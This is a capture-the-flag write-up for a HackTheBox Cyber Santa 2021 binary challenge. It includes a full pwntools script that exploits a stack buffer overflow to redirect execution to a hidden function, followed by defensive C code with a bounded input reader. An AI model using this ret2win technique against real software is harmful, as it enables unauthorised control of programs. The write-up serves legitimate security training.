Event: Cyber Santa is Coming to Town – 2021 HackTheBox
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But this ☃️ snowman… it scares me. He is always 👀 staring at Santa’s house. Something must be wrong with him.
This is the mission: deactivate that camera.
Opening the binary in Ghidra and analyzing the “investigate” function, we can clearly see that there is no way of destroying that camera by any conventional means.
But inside the list of the Functions there’s something particular:
Opening the function:
This is what we were looking for: the path to the flag lies in this function, but how can we trigger it?
Python is always a good friend in this type of situation.
Using pwntools we can find the memory address of the deactivate_camera function and, with a buffer overflow (caused by an unchecked data input that is written into a fixed-size buffer), make the program return to that specific address.
The size of the buffer, and therefore the offset to the saved return address, can be found by trial and error with payloads of increasing length:
payload = b'A'*offset+flag_index #full payload
Add some interaction with the remote host, put everything together and:
from pwn import *

host = '18.104.22.168'
port = 32020
p = remote(host, port)
e = ELF('./mr_snowy')  # ELF file, used to resolve the address of deactivate_camera

print(p.recvuntil(b"it be"))
print(p.recvline())
p.sendline(b'1')  # choose the menu entry that reads our input
print(p.recvuntil(b">"))

flag_index = p64(e.symbols['deactivate_camera'])  # target address, packed as 64-bit little-endian
offset = 72  # filler bytes before the saved return address (found by trial and error)
payload = b'A' * offset + flag_index  # full payload
p.sendline(payload)  # send data

for i in range(0, 18):
    print(p.recvline())
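Seen from the defender's side, the root cause is a fixed-size stack buffer filled by an input routine that never checks the length. The following C example is added here and is not the challenge source or the writeup's code; the buffer size (64), the menu range (1..2) and the sketched unbounded read are constructed assumptions. It shows a bounded reader that rejects an overlong line instead of letting it reach the saved return address.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed values: the writeup does not give the real buffer size or menu. */
#define CHOICE_BUF 64
#define MENU_MAX   2

/* Vulnerable pattern (sketch of the bug class, not the challenge source):
 *     char buf[64];
 *     read(0, buf, 0x100);   // up to 256 bytes into a 64-byte stack buffer
 * Bytes past the buffer overwrite the saved return address, which is why
 * filler followed by an 8-byte address is enough to redirect execution. */

/* Hardened reader: stores at most sizeof buf - 1 bytes, treats a missing
 * newline as "line too long" (drains and rejects it so the tail is not
 * parsed as the next input) and accepts only the defined menu values.
 * Returns the choice, or -1 on EOF, overlong or invalid input. */
int read_menu_choice(FILE *in) {
    char buf[CHOICE_BUF];
    if (fgets(buf, sizeof buf, in) == NULL)
        return -1;
    char *nl = strchr(buf, '\n');
    if (nl == NULL) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;                      /* discard the rest of the overlong line */
        return -1;
    }
    *nl = '\0';
    char *end;
    long v = strtol(buf, &end, 10);
    if (end == buf || *end != '\0' || v < 1 || v > MENU_MAX)
        return -1;
    return (int)v;
}

/* Feed a constructed string as if it were stdin (used by the tests). */
int choice_from_string(const char *input) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -1;
    int r = read_menu_choice(f);
    fclose(f);
    return r;
}
```

A payload of 72 filler bytes plus an address, as used above, is 80 bytes: it exceeds the buffer, carries no newline within the first 63 bytes, and is therefore rejected and drained rather than written past the buffer.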